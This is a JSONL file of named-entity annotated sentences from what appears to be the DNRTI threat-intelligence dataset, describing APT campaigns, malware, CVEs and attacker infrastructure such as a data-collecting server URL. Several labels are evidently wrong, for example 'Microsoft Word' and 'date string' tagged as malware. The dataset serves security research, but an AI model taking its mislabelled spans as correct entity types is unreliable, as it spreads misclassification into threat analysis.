{"text": "On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": {"Organization: FireEye": [[18, 25]], "Vulnerability: vulnerability": [[83, 96]], "Organization: government organization": [[109, 132]]}, "info": {"id": "dnrti_valid_000513", "source": "dnrti_valid"}}
{"text": "Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack .", "spans": {"Organization: Google": [[0, 6]], "Organization: Microsoft": [[11, 20]], "Vulnerability: CVE-2016-7855": [[102, 115]]}, "info": {"id": "dnrti_valid_000514", "source": "dnrti_valid"}}
{"text": "Kaspersky first became aware of BlackOasis’ activities in May 2016 , while investigating another Adobe Flash zero day .", "spans": {"Organization: Kaspersky": [[0, 9]], "Vulnerability: zero day": [[109, 117]]}, "info": {"id": "dnrti_valid_000515", "source": "dnrti_valid"}}
{"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": {"Malware: Microsoft Word documents": [[64, 88]], "Vulnerability: CVE-2017-0199": [[100, 113]]}, "info": {"id": "dnrti_valid_000525", "source": "dnrti_valid"}}
{"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": {"Vulnerability: Java zero-day vulnerability": [[30, 57]], "Vulnerability: CVE-2012-4681": [[60, 73]], "Malware: Microsoft Word": [[119, 133]], "Vulnerability: CVE-2010-3333": [[136, 149]], "Vulnerability: CVE-2010-2883": [[175, 188]]}, "info": {"id": "dnrti_valid_000526", "source": "dnrti_valid"}}
{"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"Malware: Documents": [[0, 9]], "Vulnerability: Flash exploit": [[19, 32]]}, "info": {"id": "dnrti_valid_000527", "source": "dnrti_valid"}}
{"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": {"Malware: malicious Word documents": [[21, 45]], "Vulnerability: Windows OLE Automation Array Remote Code Execution Vulnerability": [[74, 138]], "Vulnerability: CVE-2014-6332": [[150, 163]]}, "info": {"id": "dnrti_valid_000529", "source": "dnrti_valid"}}
{"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"Malware: RTF file": [[41, 49]], "Vulnerability: CVE-2017-0199": [[65, 78]]}, "info": {"id": "dnrti_valid_000530", "source": "dnrti_valid"}}
{"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": {"Malware: bait document": [[5, 18]], "Malware: Word document": [[68, 81]], "Vulnerability: CVE-2012-0158": [[102, 115]]}, "info": {"id": "dnrti_valid_000531", "source": "dnrti_valid"}}
{"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": {"Malware: .rtf file": [[43, 52]], "Vulnerability: CVE-2017-0199": [[68, 81]]}, "info": {"id": "dnrti_valid_000532", "source": "dnrti_valid"}}
{"text": "The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network .", "spans": {}, "info": {"id": "dnrti_valid_000533", "source": "dnrti_valid"}}
{"text": "More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system .", "spans": {}, "info": {"id": "dnrti_valid_000534", "source": "dnrti_valid"}}
{"text": "The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities .", "spans": {"Organization: NSA": [[105, 108]]}, "info": {"id": "dnrti_valid_000535", "source": "dnrti_valid"}}
{"text": "After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on .", "spans": {}, "info": {"id": "dnrti_valid_000536", "source": "dnrti_valid"}}
{"text": "The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones .", "spans": {}, "info": {"id": "dnrti_valid_000537", "source": "dnrti_valid"}}
{"text": "These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied .", "spans": {}, "info": {"id": "dnrti_valid_000538", "source": "dnrti_valid"}}
{"text": "The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware .", "spans": {}, "info": {"id": "dnrti_valid_000539", "source": "dnrti_valid"}}
{"text": "As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts .", "spans": {}, "info": {"id": "dnrti_valid_000540", "source": "dnrti_valid"}}
{"text": "we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage .", "spans": {}, "info": {"id": "dnrti_valid_000541", "source": "dnrti_valid"}}
{"text": "Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , ” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients .", "spans": {}, "info": {"id": "dnrti_valid_000542", "source": "dnrti_valid"}}
{"text": "We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property .", "spans": {}, "info": {"id": "dnrti_valid_000543", "source": "dnrti_valid"}}
{"text": "In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage .", "spans": {}, "info": {"id": "dnrti_valid_000544", "source": "dnrti_valid"}}
{"text": "Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world .", "spans": {}, "info": {"id": "dnrti_valid_000545", "source": "dnrti_valid"}}
{"text": "In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials .", "spans": {}, "info": {"id": "dnrti_valid_000546", "source": "dnrti_valid"}}
{"text": "In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers’ networks .", "spans": {"Organization: (MSPs)": [[91, 97]]}, "info": {"id": "dnrti_valid_000547", "source": "dnrti_valid"}}
{"text": "This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access .", "spans": {}, "info": {"id": "dnrti_valid_000548", "source": "dnrti_valid"}}
{"text": "They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API .", "spans": {}, "info": {"id": "dnrti_valid_000549", "source": "dnrti_valid"}}
{"text": "The attacker gained access to the victim’s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network .", "spans": {}, "info": {"id": "dnrti_valid_000550", "source": "dnrti_valid"}}
{"text": "The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script .", "spans": {}, "info": {"id": "dnrti_valid_000551", "source": "dnrti_valid"}}
{"text": "APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world .", "spans": {"Organization: MSPs": [[39, 43]]}, "info": {"id": "dnrti_valid_000552", "source": "dnrti_valid"}}
{"text": "What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal .", "spans": {}, "info": {"id": "dnrti_valid_000554", "source": "dnrti_valid"}}
{"text": "It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person .", "spans": {}, "info": {"id": "dnrti_valid_000555", "source": "dnrti_valid"}}
{"text": "In theory , Shun Wang Technologies could have collected a third of China’s population names and contact numbers if not more .", "spans": {}, "info": {"id": "dnrti_valid_000557", "source": "dnrti_valid"}}
{"text": "With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November’s Single’s Day and December’s Asian online shopping fest .", "spans": {}, "info": {"id": "dnrti_valid_000558", "source": "dnrti_valid"}}
{"text": "In Operation Sheep’s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement .", "spans": {}, "info": {"id": "dnrti_valid_000559", "source": "dnrti_valid"}}
{"text": "APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates .", "spans": {}, "info": {"id": "dnrti_valid_000560", "source": "dnrti_valid"}}
{"text": "Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates .", "spans": {}, "info": {"id": "dnrti_valid_000561", "source": "dnrti_valid"}}
{"text": "We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft .", "spans": {}, "info": {"id": "dnrti_valid_000562", "source": "dnrti_valid"}}
{"text": "In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites .", "spans": {}, "info": {"id": "dnrti_valid_000563", "source": "dnrti_valid"}}
{"text": "We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise .", "spans": {}, "info": {"id": "dnrti_valid_000564", "source": "dnrti_valid"}}
{"text": "In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks .", "spans": {}, "info": {"id": "dnrti_valid_000565", "source": "dnrti_valid"}}
{"text": "Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier .", "spans": {"Malware: date string": [[35, 46]], "Malware: date codes": [[64, 74]]}, "info": {"id": "dnrti_valid_000600", "source": "dnrti_valid"}}
{"text": "In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task .", "spans": {"Malware: Careto": [[59, 65]]}, "info": {"id": "dnrti_valid_000601", "source": "dnrti_valid"}}
{"text": "The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon .", "spans": {"Malware: CONFUCIUS_B": [[4, 15]]}, "info": {"id": "dnrti_valid_000602", "source": "dnrti_valid"}}
{"text": "The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio .", "spans": {"Malware: Android version": [[4, 19]]}, "info": {"id": "dnrti_valid_000603", "source": "dnrti_valid"}}
{"text": "If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs .", "spans": {"Malware: bot": [[5, 8]]}, "info": {"id": "dnrti_valid_000604", "source": "dnrti_valid"}}
{"text": "This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics .", "spans": {"Malware: document": [[5, 13]]}, "info": {"id": "dnrti_valid_000605", "source": "dnrti_valid"}}
{"text": "There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information .", "spans": {"Malware: exploit code": [[13, 25]]}, "info": {"id": "dnrti_valid_000606", "source": "dnrti_valid"}}
{"text": "This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": {"Malware: .lnk file": [[53, 62]]}, "info": {"id": "dnrti_valid_000607", "source": "dnrti_valid"}}
{"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": {"Malware: attachment": [[35, 45]], "Malware: DLL side-loading": [[99, 115]]}, "info": {"id": "dnrti_valid_000608", "source": "dnrti_valid"}}
{"text": "wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 .", "spans": {"Malware: wuaupdt.exe": [[0, 11]]}, "info": {"id": "dnrti_valid_000610", "source": "dnrti_valid"}}
{"text": "As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC .", "spans": {"Malware: AutoHotKey scripts": [[66, 84]]}, "info": {"id": "dnrti_valid_000611", "source": "dnrti_valid"}}
{"text": "The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc .", "spans": {"Malware: RAT": [[4, 7]]}, "info": {"id": "dnrti_valid_000612", "source": "dnrti_valid"}}
{"text": "Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor .", "spans": {"Malware: Bemstour": [[0, 8]]}, "info": {"id": "dnrti_valid_000613", "source": "dnrti_valid"}}
{"text": "DoublePulsar is then used to inject a secondary payload , which runs in memory only .", "spans": {"Malware: DoublePulsar": [[0, 12]]}, "info": {"id": "dnrti_valid_000614", "source": "dnrti_valid"}}
{"text": "The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation .", "spans": {"Malware: Okrum": [[52, 57]]}, "info": {"id": "dnrti_valid_000615", "source": "dnrti_valid"}}
{"text": "The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals .", "spans": {"Malware: Sea Turtle": [[67, 77]]}, "info": {"id": "dnrti_valid_000616", "source": "dnrti_valid"}}
{"text": "If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file .", "spans": {"Malware: it": [[50, 52]]}, "info": {"id": "dnrti_valid_000617", "source": "dnrti_valid"}}
{"text": "Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies .", "spans": {"Malware: Margarita": [[33, 42]]}, "info": {"id": "dnrti_valid_000618", "source": "dnrti_valid"}}
{"text": "Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant .", "spans": {"Malware: Honeycomb": [[0, 9]]}, "info": {"id": "dnrti_valid_000619", "source": "dnrti_valid"}}
{"text": "UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques .", "spans": {"Malware: UMBRAGE": [[0, 7]]}, "info": {"id": "dnrti_valid_000620", "source": "dnrti_valid"}}
{"text": "'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) .", "spans": {"Malware: 'Improvise'": [[0, 11]]}, "info": {"id": "dnrti_valid_000621", "source": "dnrti_valid"}}
{"text": "This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 .", "spans": {"Malware: sample": [[5, 11]], "Malware: Trochilus": [[31, 40]]}, "info": {"id": "dnrti_valid_000622", "source": "dnrti_valid"}}
{"text": "The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process .", "spans": {"Malware: configuration file": [[4, 22]]}, "info": {"id": "dnrti_valid_000623", "source": "dnrti_valid"}}
{"text": "Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials .", "spans": {"Malware: Citrix-hosted": [[111, 124]]}, "info": {"id": "dnrti_valid_000624", "source": "dnrti_valid"}}
{"text": "This powerful backdoor can receive commands from the attackers , enabling it to exfiltrate files from the system it is running on , execute additional scripts , delete files , and more .", "spans": {"Malware: backdoor": [[14, 22]]}, "info": {"id": "dnrti_valid_000625", "source": "dnrti_valid"}}
{"text": "In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document .", "spans": {"Malware: VBA2Graph": [[23, 32]]}, "info": {"id": "dnrti_valid_000626", "source": "dnrti_valid"}}
{"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” .", "spans": {"Malware: JavaScript": [[4, 14]]}, "info": {"id": "dnrti_valid_000627", "source": "dnrti_valid"}}
{"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT .", "spans": {}, "info": {"id": "dnrti_valid_000628", "source": "dnrti_valid"}}
{"text": "CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering .", "spans": {"Organization: CTU": [[0, 3]]}, "info": {"id": "dnrti_valid_000629", "source": "dnrti_valid"}}
{"text": "The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic .", "spans": {}, "info": {"id": "dnrti_valid_000630", "source": "dnrti_valid"}}
{"text": "COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training .", "spans": {}, "info": {"id": "dnrti_valid_000631", "source": "dnrti_valid"}}
{"text": "The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel .", "spans": {}, "info": {"id": "dnrti_valid_000632", "source": "dnrti_valid"}}
{"text": "PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper .", "spans": {"Organization: PwC UK": [[0, 6]], "Organization: BAE Systems": [[11, 22]]}, "info": {"id": "dnrti_valid_000633", "source": "dnrti_valid"}}
{"text": "By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage .", "spans": {}, "info": {"id": "dnrti_valid_000634", "source": "dnrti_valid"}}
{"text": "Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": {"Organization: governmental": [[37, 49]], "Organization: embassies": [[90, 99]], "Organization: financial institutions": [[156, 178]], "Organization: journalists": [[181, 192]], "Organization: software developers": [[195, 214]]}, "info": {"id": "dnrti_valid_000635", "source": "dnrti_valid"}}
{"text": "FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors .", "spans": {"Organization: financial sectors": [[105, 122]]}, "info": {"id": "dnrti_valid_000636", "source": "dnrti_valid"}}
{"text": "Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors .", "spans": {"Organization: Oil sectors": [[189, 200]]}, "info": {"id": "dnrti_valid_000637", "source": "dnrti_valid"}}
{"text": "The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry .", "spans": {}, "info": {"id": "dnrti_valid_000638", "source": "dnrti_valid"}}
{"text": "The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros .", "spans": {}, "info": {"id": "dnrti_valid_000639", "source": "dnrti_valid"}}
{"text": "Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature .", "spans": {}, "info": {"id": "dnrti_valid_000640", "source": "dnrti_valid"}}
{"text": "The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia .", "spans": {}, "info": {"id": "dnrti_valid_000641", "source": "dnrti_valid"}}
{"text": "These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": {}, "info": {"id": "dnrti_valid_000642", "source": "dnrti_valid"}}
{"text": "Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": {}, "info": {"id": "dnrti_valid_000643", "source": "dnrti_valid"}}
{"text": "Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system .", "spans": {}, "info": {"id": "dnrti_valid_000645", "source": "dnrti_valid"}}
{"text": "These VNC exectuables would either be included in the SFX file or downloaded by the batch script .", "spans": {}, "info": {"id": "dnrti_valid_000646", "source": "dnrti_valid"}}
{"text": "Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute .", "spans": {}, "info": {"id": "dnrti_valid_000647", "source": "dnrti_valid"}}
{"text": "The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out .", "spans": {}, "info": {"id": "dnrti_valid_000648", "source": "dnrti_valid"}}
{"text": "Gorgon Group used common URL shortening services to download payloads .", "spans": {}, "info": {"id": "dnrti_valid_000649", "source": "dnrti_valid"}}
{"text": "Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication .", "spans": {}, "info": {"id": "dnrti_valid_000650", "source": "dnrti_valid"}}
{"text": "This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics .", "spans": {"Malware: malicious Word documents": [[159, 183]]}, "info": {"id": "dnrti_valid_000652", "source": "dnrti_valid"}}
{"text": "All contain the same Visual Basic macro code and author name as Honeybee .", "spans": {}, "info": {"id": "dnrti_valid_000653", "source": "dnrti_valid"}}
{"text": "Ke3chang attackers have used spear-phishing emails .", "spans": {}, "info": {"id": "dnrti_valid_000654", "source": "dnrti_valid"}}
{"text": "Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download .", "spans": {}, "info": {"id": "dnrti_valid_000655", "source": "dnrti_valid"}}
{"text": "DLL hijacking techniques have been seen in the past with the APT15 group .", "spans": {}, "info": {"id": "dnrti_valid_000656", "source": "dnrti_valid"}}
{"text": "This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": {"Organization: Bitcoin users": [[129, 142]], "Organization: financial organizations": [[154, 177]]}, "info": {"id": "dnrti_valid_000657", "source": "dnrti_valid"}}
{"text": "This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations .", "spans": {"Organization: financial organizations": [[129, 152]]}, "info": {"id": "dnrti_valid_000658", "source": "dnrti_valid"}}
{"text": "Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": {"Organization: job recruiters": [[108, 122]]}, "info": {"id": "dnrti_valid_000659", "source": "dnrti_valid"}}
{"text": "Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer .", "spans": {}, "info": {"id": "dnrti_valid_000660", "source": "dnrti_valid"}}
{"text": "Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 .", "spans": {}, "info": {"id": "dnrti_valid_000661", "source": "dnrti_valid"}}